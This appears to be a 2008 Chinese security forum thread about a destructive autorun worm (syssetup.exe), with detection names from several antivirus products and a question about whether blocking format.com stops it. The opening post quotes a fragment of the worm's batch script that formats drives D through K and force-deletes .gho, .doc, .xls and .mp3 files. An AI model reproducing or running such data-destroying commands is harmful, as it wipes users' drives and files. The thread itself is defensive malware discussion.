這個也有受害者，不過因為破壞性高所以沒什麼人有提到

只是剛好有人有中我提到這一個所以他抓到樣本了

放上來給各位看看

擷取裡面一小段字串

f o r   % % i   i n   ( d   e   f   g   h   i   j   k )   d o   (   Z         f s u t i l   f s i n f o   d r i v e t y p e   % % i :   |   f i n d s t r   / i        "  ....f o r m a t   % % i :   / q / y / x

d e l   / s / f / q   % % i \ * . g h o   &   d e l   / s / f / q   % % i \ * . d o c   &   d e l   / s / f / q   % % i \ * . x l s   &   d e l   % % i \ * . m p 3

[ 本帖最後由 sylovanas 於 2008-9-18 12:28 編輯 ]

驱逐舰发现病毒
Win32.HLLW.Autoruner.1175

如果我在KIS2009的HIPS上已經封鎖了C:\Windows\System32\format.com
是不是病毒就不可以格式化我的電腦?

引用:

原帖由 卡巴斯基 於 2008-9-18 17:42 發表
如果我在KIS2009的HIPS上已經封鎖了C:\Windows\System32\format.com
是不是病毒就不可以格式化我的電腦?

看是否有調度到,如果不是調度該執行檔,那就沒用 .

NOD32 3.0
病毒資料庫3449
未發現病毒
已上報

ESS 3.0
病毒資料庫3452
syssetup.rar > RAR > syssetup.exe - Win32/AutoRun.AAH 蠕蟲

AVK2007
物件: syssetup.exe
        在壓縮檔中: syssetup.rar
        狀態: 已偵測病毒
        病毒: Worm.Win32.VB.gh (引擎 A)

[ 本帖最後由 chou 於 2008-9-18 22:38 編輯 ]

W32/Autorun.worm.h

引用:

原帖由 卡巴斯基 於 2008-9-18 17:42 發表
如果我在KIS2009的HIPS上已經封鎖了C:\Windows\System32\format.com
是不是病毒就不可以格式化我的電腦?

KIS預設就防low level disk access

明白了!謝謝~原來KIS防到~

Trend Micro Internet Security Pro 2009  ：WORM_VB.AFJ

McAfee-
syssetup.exe-W32/Autorun.worm.h